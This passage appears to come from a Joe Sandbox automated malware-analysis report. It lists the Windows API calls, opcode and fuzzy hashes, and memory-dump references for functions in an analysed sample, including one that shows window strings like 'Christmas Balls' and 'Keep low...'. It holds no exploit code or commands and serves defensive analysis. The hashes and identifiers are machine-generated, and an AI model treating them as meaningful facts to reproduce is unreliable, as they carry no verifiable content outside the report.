                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: 914d03f27b1cefc370cb0f7aab1d088bf29018f6e2cf6c081d0efc67ca911899
                                                                                                                                                                                                                                              • Instruction ID: acdce7f1850c19d0f8b94c8ef48d2ed1b88dbc5cef083b9871fa533e09188114
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 914d03f27b1cefc370cb0f7aab1d088bf29018f6e2cf6c081d0efc67ca911899
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF215672635207ABDB2CDF65EC85A7A73A8EF48314F10407AFE05DA581E7B4ED908A50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002402E4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: 51f510c6c598b125be2c0579f6d5f58360c9c0d5c2d9533ebc252d17110a238e
                                                                                                                                                                                                                                              • Instruction ID: 7c9fa5e335caa2b21aa5ae2756e71346b345461365dace5e627b96557a0157cc
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51f510c6c598b125be2c0579f6d5f58360c9c0d5c2d9533ebc252d17110a238e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C711C67293020BABD719EF28EC869BA77ACEF04314B10417AFA01DB241EB74ED508B50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0023FEBE,00000001,00000000,?,-00000050,?,0023FCAE,00000000,-00000002,00000000,?,00000055,?), ref: 0023FE95
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 64c27688c3e23bc4652d13ad82028eb62a776a001b5dc8091d59f5ca5349dab4
                                                                                                                                                                                                                                              • Instruction ID: ba2fb6be95d1cb7c59f7a09beb7a6fb29e29b4cb14103adeefd3f9751798d37a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 64c27688c3e23bc4652d13ad82028eb62a776a001b5dc8091d59f5ca5349dab4
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65114C776143055FDB289F39D8A16BAB792FF80358F14443DE54687741D371B952CB40
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,002400DA,00000000,00000000,?), ref: 00240469
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3736152602-0
                                                                                                                                                                                                                                              • Opcode ID: a41054ec0ceb63d68de7c0b57fd0e758b1ece40d23570fcdbc1588be0d1dbd2b
                                                                                                                                                                                                                                              • Instruction ID: b5a187640eed48fb3b60a010d698128e427b1d017ed9ed246eed9edbbee27ffd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a41054ec0ceb63d68de7c0b57fd0e758b1ece40d23570fcdbc1588be0d1dbd2b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BF01DB36630112ABDB2C5B668C45BBA7764EB80364F154429EF42A3180DA70EE91DD90
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00240170,00000001,?,?,-00000050,?,0023FC76,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0024015B
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: 0eb4cc7e6185be288655b73e746504bcc000813c6c93c82447b2c3de8c31fb1b
                                                                                                                                                                                                                                              • Instruction ID: 300e9e29af786889d5a649845573fb5aa720944b21a12222f86667d9163917b6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb4cc7e6185be288655b73e746504bcc000813c6c93c82447b2c3de8c31fb1b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 44F0F6363107056FDB295F759CC1A7B7B91FF80768F05442DFA494B690C6B1AC92CA50
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00236BF4: EnterCriticalSection.KERNEL32(?,?,0023AFB0,?,002550C0,00000008,0023AEA2,?,?,?), ref: 00236C03
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(0023BB53,00000001,00255140,0000000C,0023B4B8,-00000050), ref: 0023BB98
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1272433827-0
                                                                                                                                                                                                                                              • Opcode ID: ffb13d901bfc9493a30a4839dc9011a419e083cb381682f7dafae746bb66ea30
                                                                                                                                                                                                                                              • Instruction ID: b8dfe675581e6a07a15a1e78337d7c7e74a89015758fc571fdcf570b7e9229ef
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ffb13d901bfc9493a30a4839dc9011a419e083cb381682f7dafae746bb66ea30
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8CF04F72A10304EFD701DFA8E806B9D77F1EB08726F10801AF810DB2A1CBB559158F54
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: GetLastError.KERNEL32(?,?,00233FBA,00254C30,0000000C), ref: 0023AB27
                                                                                                                                                                                                                                                • Part of subcall function 0023AB23: SetLastError.KERNEL32(00000000), ref: 0023ABC9
                                                                                                                                                                                                                                              • EnumSystemLocalesW.KERNEL32(00240290,00000001,?,?,?,0023FCD0,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0024027C
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2417226690-0
                                                                                                                                                                                                                                              • Opcode ID: c70e6f87bbd5d67e7517055f0b5102711cc69c42f053048f69305a55bd0ebaba
                                                                                                                                                                                                                                              • Instruction ID: 3a663c11e79fd82cf77b70b6a844cccf0e4cc9767e5f2a9ea59201ac022eda58
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c70e6f87bbd5d67e7517055f0b5102711cc69c42f053048f69305a55bd0ebaba
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69F0AB3A31030957CB09DF35D89976ABFE0EFC1720F0A4058EF058B280C2B19982C794
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00235950,?,20001004,00000000,00000002,?,?,00234862), ref: 0023B5F0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                                                                              • Opcode ID: ee824676d43be1841cc2b65f74aaa68202e438f603a1b1390d92c70935c22fce
                                                                                                                                                                                                                                              • Instruction ID: 5cbae91b40ea7943cf1c0a08a2be3d003e01b64eed184cfe2974ab7fe4f1aea5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee824676d43be1841cc2b65f74aaa68202e438f603a1b1390d92c70935c22fce
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E04F72910218BBCF236F61EC08A9E7F25EF44791F108011FE0565221CB71CA31AA98
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000D984), ref: 0022D868
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                                                                                                              • Opcode ID: aaf3565c5566ff0f8c41bd20e0e973d4187c1ce465b53c8fd3366836df113a4c
                                                                                                                                                                                                                                              • Instruction ID: 2534e0028dd3a87412a90bcbfa496b263aeb0b840c0dadb1a90398b06c9e9703
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaf3565c5566ff0f8c41bd20e0e973d4187c1ce465b53c8fd3366836df113a4c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                                              • Opcode ID: 0364b532dedc612c1cf6032aefb717e67b8544cfc101a92d00092215f0ca6e03
                                                                                                                                                                                                                                              • Instruction ID: 7c320992a42df03f5b42b0a1d991b529fcae0f73319df5cfd0eb3a2ec3724cd4
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0364b532dedc612c1cf6032aefb717e67b8544cfc101a92d00092215f0ca6e03
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 26A01130A203008B83008F32BA0C2083BA8AA802C230A8028A000E00B0EA388880AF0A
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00221F53
                                                                                                                                                                                                                                              • RegisterClassW.USER32(?), ref: 00221F6A
                                                                                                                                                                                                                                              • CreateWindowExW.USER32 ref: 00221FCA
                                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00221FD4
                                                                                                                                                                                                                                              • GetMessageW.USER32(Christmas Balls,00000000,00000000,00000000), ref: 00222000
                                                                                                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0022203D
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$ClassCreateErrorHandleLastModuleRegisterWindow
                                                                                                                                                                                                                                              • String ID: Christmas Balls$CreatingTool$Keep low...$[err id]: %i
                                                                                                                                                                                                                                              • API String ID: 91802587-478130180
                                                                                                                                                                                                                                              • Opcode ID: 129289fd0d95153b45c3c335ee487141f23fa5fcfe7247362ef1068c339ca247
                                                                                                                                                                                                                                              • Instruction ID: 150aa13a4215b8f1aa0a404bc79e28819560cd65be722921487d5a385dfba0c3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 129289fd0d95153b45c3c335ee487141f23fa5fcfe7247362ef1068c339ca247
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A641D370A28341EFD300DF60E849B2BB7E4BF98705F00561CF9889B250DB71E964CB56
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetCPInfo.KERNEL32(016AFC58,016AFC58,00000000,7FFFFFFF,?,002496FD,016AFC58,016AFC58,00000000,016AFC58,?,?,?,?,016AFC58,00000000), ref: 002497B8
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00249873
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 00249902
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0024994D
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00249953
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 00249989
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0024998F
                                                                                                                                                                                                                                              • __freea.LIBCMT ref: 0024999F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 127012223-0
                                                                                                                                                                                                                                              • Opcode ID: dccd086bd7c98febbcaf1ef2873e6fab52d98063a874f8f0a109f80ec487ae8d
                                                                                                                                                                                                                                              • Instruction ID: a77b1807e77199eff7a30aefdfe913daa1513ce3fa1fe404cdc3e68e3cf591f3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dccd086bd7c98febbcaf1ef2873e6fab52d98063a874f8f0a109f80ec487ae8d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF71F87293024A6FDF299FA48C82FAFB7B9DF45310F150059E944B7242D7759CA0CB51
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0022DECC
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0022DEF8
                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0022DF37
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0022DF54
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0022DF93
                                                                                                                                                                                                                                              • __alloca_probe_16.LIBCMT ref: 0022DFB0
                                                                                                                                                                                                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0022DFF2
                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0022E015
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000008.00000002.2859115860.0000000000221000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00220000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859092667.0000000000220000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859144990.000000000024B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859166744.0000000000256000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859186013.0000000000257000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859214377.000000000025B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000008.00000002.2859236826.000000000025D000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_220000_d0d9725343.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2040435927-0
                                                                                                                                                                                                                                              • Opcode ID: 01820b5e91838856b581c91fb14ebaa471e61facb4963126e32138b1e2bee703
